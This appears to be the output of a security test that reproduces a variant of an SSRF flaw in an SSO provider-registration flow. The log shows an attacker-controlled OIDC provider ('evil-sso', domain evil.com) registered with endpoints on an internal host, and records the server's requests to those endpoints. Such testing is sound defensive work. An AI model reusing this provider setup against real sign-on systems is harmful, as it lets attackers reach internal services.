RUN  v4.1.10 /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant/fixed stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP register response: 200 { "issuer": "http://974542b9802b:9876", "oidcConfig": { "issuer": "http://974542b9802b:9876", "clientId": "evil-client", "clientSecret": "evil-secret", "authorizationEndpoint": "http://974542b9802b:9876/authorize", "tokenEndpoint": "http://974542b9802b:9876/token", "tokenEndpointAuthentication": "client_secret_basic", "jwksEndpoint": "http://974542b9802b:9876/jwks", "pkce": true, "discoveryEndpoint": "http://974542b9802b:9876/.well-known/openid-configuration", "mapping": { "id": "sub", "email": "email", "emailVerified": "email_verified", "name": "name", "image": "picture" }, "userInfoEndpoint": "http://974542b9802b:9876/userinfo", "overrideUserInfo": false }, "samlConfig": null, "userId": "cw3xJQJzxxVd48TCb85GdgCskCdhhF5H", "providerId": "evil-sso", "organizationId": null, "domain": "evil.com", "id": "iynCS217IZoQYRcVYhea2ADItYW5SYC2", "redirectURI": "http://localhost:3000/api/auth/sso/callback/evil-sso" } stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP sign-in response: 200 { "url": "http://974542b9802b:9876/authorize?response_type=code&client_id=evil-client&state=JNuJbGp4Bqsp8JDSkNKcK_sPzvqkDphH&scope=openid+email+profile+offline_access&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso&code_challenge_method=S256&code_challenge=LohdDrBf5tlQ_OT9TdCGxXI4W5BK4WYkPztSezLjL7g", "redirect": true } stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP authorize response: 302 location: http://localhost:3000/api/auth/sso/callback/evil-sso?code=attacker-code&state=JNuJbGp4Bqsp8JDSkNKcK_sPzvqkDphH stdout | variant-hostname-ssrf.test.ts > SSO SSRF via public-FQDN/private-IP bypass > attempts SSRF via a public-FQDN that resolves to a private IP callback status: 302 location: http://localhost:3000/api/auth/error?error=account not linked attacker requests: [ { "method": "GET", "url": "/authorize?response_type=code&client_id=evil-client&state=JNuJbGp4Bqsp8JDSkNKcK_sPzvqkDphH&scope=openid+email+profile+offline_access&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso&code_challenge_method=S256&code_challenge=LohdDrBf5tlQ_OT9TdCGxXI4W5BK4WYkPztSezLjL7g", "body": "" }, { "method": "POST", "url": "/token", "body": "grant_type=authorization_code&code=attacker-code&code_verifier=Lb8qt2ORm16Y9Kct7a_oPI1SvXvMRasb8kWiFMOqOIK7wJSm_6NOll_-Go32hroXKRbZREXBWAmnvKqmS7kW1ZcwYB_EvCQ22dNR4--9NtGxurvlB3L1VhBattxh2U7h&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso" }, { "method": "GET", "url": "/userinfo", "body": "" } ] ✓ variant-hostname-ssrf.test.ts (1 test) 144ms  Test Files  1 passed (1)  Tests  1 passed (1)  Start at  23:46:44  Duration  580ms (transform 22ms, setup 0ms, import 357ms, tests 144ms, environment 0ms)